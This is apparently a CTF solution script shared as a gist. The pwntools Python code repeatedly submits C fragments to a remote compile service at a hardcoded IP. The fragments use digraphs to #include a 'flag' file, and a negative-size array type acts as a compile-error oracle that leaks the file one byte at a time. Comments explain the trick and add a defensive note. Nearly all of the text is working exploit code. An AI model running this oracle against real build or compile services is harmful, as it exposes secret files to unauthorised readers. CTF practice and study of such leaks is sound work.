@kokjo
Created December 29, 2019 20:04
from pwn import *
import base64
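# C fragment submitted to the remote compile service once per guess.
#
# The string is filled in with Python %-formatting, so every "%%" below is a
# literal "%" in the text that is sent. "%:" and "%>" are the C digraphs for
# "#" and "}", so the fragment carries preprocessor directives and a closing
# brace without containing either character literally.
#
# How the probe works, as far as the template itself shows:
#   * `str(x)` stringifies its argument and `hxp` expands to `str(`, so the
#     included file "flag" is turned into a string literal at compile time
#     (assumes the file starts with the token `hxp` -- not visible here).
#   * `check_t` is an array type whose size is -1 when the character at
#     `offset` equals `byte`, and 0 otherwise. A negative size is a compile
#     error, so the compiler's verdict reveals one comparison per request.
#
# NOTE(review): the service-side wrapper around the submitted code is not
# shown on this page; the leading "%>" and trailing "//" presumably close and
# comment out parts of that wrapper -- confirm against the service source.
#
# Defensive takeaway: a compile service that lets submitted code `#include`
# files readable by the compiler and reports success/failure exposes those
# files through exactly this kind of one-bit oracle. The compiler should run
# where no secret is readable.
template = """
%%>
%%:pragma clang diagnostic ignored "-Wunused-local-typedef"
%%:pragma clang diagnostic ignored "-Wunused-variable"
%%:define str(x) %%:x
%%:define hxp str(
typedef char check_t[(
%%:include "flag"
)[%(offset)d] == %(byte)d) ? -1 : 0];
check_t check;
//"""

p_status = log.progress("Status")
p_flag = log.progress("Flag")

# Characters recovered so far; the loop ends once a closing brace is seen.
flag = ""
while "}" not in flag:
    offset = len(flag)
    for byte in range(32, 128):
        # One connection per guess.
        r = remote("88.198.154.157", 8011, level="error")
        try:
            r.recvuntil("> ")
            code = template % {"offset": offset, "byte": byte}
            r.sendline(b64e(code))
            res = r.recvline().strip()
        finally:
            # Close the socket even if the exchange raises, so a failed
            # probe does not leak a connection.
            r.close()
        # A reply containing "Not" is treated as the match signal.
        # NOTE(review): this is a str-in-response test; it relies on
        # recvline() returning str (Python 2 style) -- confirm before
        # running under an interpreter where it returns bytes.
        if "Not" in res:
            break
        p_status.status("Offset %d Byte %d Response %s" % (offset, byte, res))
    else:
        # No candidate matched. The original fell through here and appended
        # chr(127), which corrupted the result and kept the outer loop
        # reconnecting forever; stop instead.
        p_status.failure("No byte in 32..127 matched at offset %d" % offset)
        break
    flag += chr(byte)
    p_flag.status(flag)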